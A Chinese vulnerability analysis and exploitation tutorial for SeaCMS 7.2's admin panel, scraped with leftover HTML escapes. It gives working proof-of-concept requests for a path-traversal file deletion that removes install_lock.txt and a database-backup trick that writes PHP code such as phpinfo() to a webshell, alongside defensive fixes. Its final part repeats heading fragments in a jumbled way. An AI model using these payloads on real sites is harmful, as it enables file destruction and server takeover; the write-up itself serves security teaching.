SeaCMS 7.2 后台漏洞分析与利用教学文档<\/h1>

0x01 漏洞概述<\/h2>

SeaCMS 7.2 存在两个重要的后台漏洞：<\/p>

任意文件删除漏洞<\/li>

数据库备份Getshell漏洞<\/li> <\/ol>

这两个漏洞都需要管理员权限才能利用，属于后台漏洞。<\/p>

0x02 环境准备<\/h2>

版本确认<\/h3>

版本文件路径：\/data\/admin\/ver.txt<\/code><\/li>

访问方式：http:\/\/host.com\/data\/admin\/ver.txt<\/code><\/li>
<\/ul>
后台目录确认<\/h3>
SeaCMS安装时会随机生成后台目录名，通过分析\/install\/index.php<\/code>中的代码可知：<\/p>
function<\/span> randomkeys<\/span>($length) {
<\/span><\/span>    $pattern =<\/span> 'abcdefgh1234567890jklmnopqrstuvwxyz'<\/span>;
<\/span><\/span>    for<\/span>($i=<\/span>0<\/span>;$i<<\/span>$length;$i++<\/span>) {
<\/span><\/span>        $key .=<\/span> $pattern{mt_rand<\/span>(0<\/span>,35<\/span>)};
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $key;
<\/span><\/span>}
<\/span><\/span>$newadminname=<\/span>randomkeys<\/span>(6<\/span>);
<\/span><\/span>$jpath=<\/span>'..\/admin'<\/span>;
<\/span><\/span>$xpath=<\/span>'..\/'<\/span>.<\/span>$newadminname;
<\/span><\/span>$cadmin=<\/span>rename<\/span>($jpath,$xpath);
<\/span><\/span><\/code><\/pre>后台目录为6位随机字符串，可通过爆破方式获取。<\/p>
0x03 任意文件删除漏洞<\/h2>
漏洞位置<\/h3>
admin_template.php<\/code>文件中的删除功能<\/p>
漏洞分析<\/h3>
关键代码片段：<\/p>
elseif<\/span>($action==<\/span>'del'<\/span>){
<\/span><\/span>    if<\/span>($filedir==<\/span>''<\/span>){
<\/span><\/span>        ShowMsg<\/span>('未指定要删除的文件或文件名不合法'<\/span>, '-1'<\/span>);
<\/span><\/span>        exit<\/span>();
<\/span><\/span>    }
<\/span><\/span>    if<\/span>(substr<\/span>(strtolower<\/span>($filedir),0<\/span>,11<\/span>)!=<\/span>$dirTemplate){
<\/span><\/span>        ShowMsg<\/span>("只允许删除templets目录内的文件!"<\/span>,"admin_template.php"<\/span>);
<\/span><\/span>        exit<\/span>();
<\/span><\/span>    }
<\/span><\/span>    $folder=<\/span>substr<\/span>($filedir,0<\/span>,strrpos<\/span>($filedir,'\/'<\/span>));
<\/span><\/span>    if<\/span>(!<\/span>is_dir<\/span>($folder)){
<\/span><\/span>        ShowMsg<\/span>("目录不存在!"<\/span>,"admin_template.php"<\/span>);
<\/span><\/span>        exit<\/span>();
<\/span><\/span>    }
<\/span><\/span>    unlink<\/span>($filedir);
<\/span><\/span>    ShowMsg<\/span>("操作成功!"<\/span>,"admin_template.php?path="<\/span>.<\/span>$folder);
<\/span><\/span>    exit<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点：<\/p>

仅检查路径前11位是否为..\/templets<\/code><\/li>
未对文件后缀进行限制<\/li>
可通过路径遍历删除上级目录文件<\/li>
<\/ol>
漏洞利用POC<\/h3>
删除install_lock.txt<\/code>文件：<\/p>
GET \/qdybap\/admin_template.php?action=del&filedir=..\/templets\/default\/images\/install\/install_lock.txt HTTP\/1.1
Host: 127.0.0.1
<\/code><\/pre>
0x04 数据库备份Getshell漏洞<\/h2>
漏洞位置<\/h3>
ebak\/phomebak.php<\/code>文件中的数据库备份功能<\/p>
漏洞分析<\/h3>

数据库备份文件以.php<\/code>后缀保存<\/li>
备份时会包含表数据<\/li>
可通过修改表内容插入恶意代码<\/li>
<\/ol>
漏洞利用步骤<\/h3>

修改数据库表内容，插入PHP代码<\/li>
通过备份功能将表数据导出为PHP文件<\/li>
访问备份文件执行代码<\/li>
<\/ol>
漏洞利用POC<\/h3>
POST请求示例：<\/p>
POST \/qdybap\/ebak\/phomebak.php HTTP\/1.1
Host: 127.0.0.1
Content-Type: application\/x-www-form-urlencoded
Content-Length: 1157

phome=DoEbak&mydbname=seacms&baktype=0&filesize=1024&bakline=1000&autoauf=1&bakstru=1&dbchar=utf8&bakdatatype=1&mypath=seacms_20190107_uLDbip&insertf=replace&waitbaktime=0&readme=&tablename%5B%5D=sea_admin&...&tablename%5B%5D=phpinfo()&chkall=on&Submit=%E5%BC%80%E5%A7%8B%E5%A4%87%E4%BB%BD
<\/code><\/pre>
关键点：<\/p>

tablename[]<\/code>参数中包含phpinfo()<\/code>等恶意代码<\/li>
需要包含所有表名，否则可能导致500错误<\/li>
<\/ul>
0x05 防御措施<\/h2>
针对任意文件删除漏洞<\/h3>

严格限制可删除的目录范围<\/li>
增加文件后缀白名单检查<\/li>
对路径进行规范化处理，防止目录遍历<\/li>
<\/ol>
针对数据库备份Getshell漏洞<\/h3>

对备份文件内容进行过滤，去除PHP代码<\/li>
使用非可执行后缀（如.sql）保存备份文件<\/li>
对备份文件名进行严格校验<\/li>
<\/ol>
0x06 总结<\/h2>
SeaCMS 7.2后台存在两个高危漏洞：<\/p>

任意文件删除漏洞可导致系统关键文件被删除<\/li>
数据库备份功能可被用于写入Webshell<\/li>
<\/ol>
这两个漏洞都需要管理员权限，但一旦获取管理员权限，攻击者可以完全控制网站服务器。建议用户升级到最新版本，或按照上述防御措施进行修复。<\/p>

SeaCMS 7.2 后台漏洞分析与利用教学文档<\/h1>

0x02 环境准备<\/h2>

0x03 任意文件删除漏洞<\/h2>

漏洞位置<\/h3>
`admin_template.php<\/code>文件中的删除功能<\/p>`

0x04 数据库备份Getshell漏洞<\/h2>

漏洞位置<\/h3>
`ebak\/phomebak.php<\/code>文件中的数据库备份功能<\/p>`

0x05 防御措施<\/h2>

SeaCMS 7.2 后台漏洞分析与利用教学文档<\/h1>

0x02 环境准备<\/h2>

0x03 任意文件删除漏洞<\/h2>

漏洞位置<\/h3> admin_template.php<\/code>文件中的删除功能<\/p>

0x04 数据库备份Getshell漏洞<\/h2>

漏洞位置<\/h3> ebak\/phomebak.php<\/code>文件中的数据库备份功能<\/p>

0x05 防御措施<\/h2>

漏洞位置<\/h3>
`admin_template.php<\/code>文件中的删除功能<\/p>`

漏洞位置<\/h3>
`ebak\/phomebak.php<\/code>文件中的数据库备份功能<\/p>`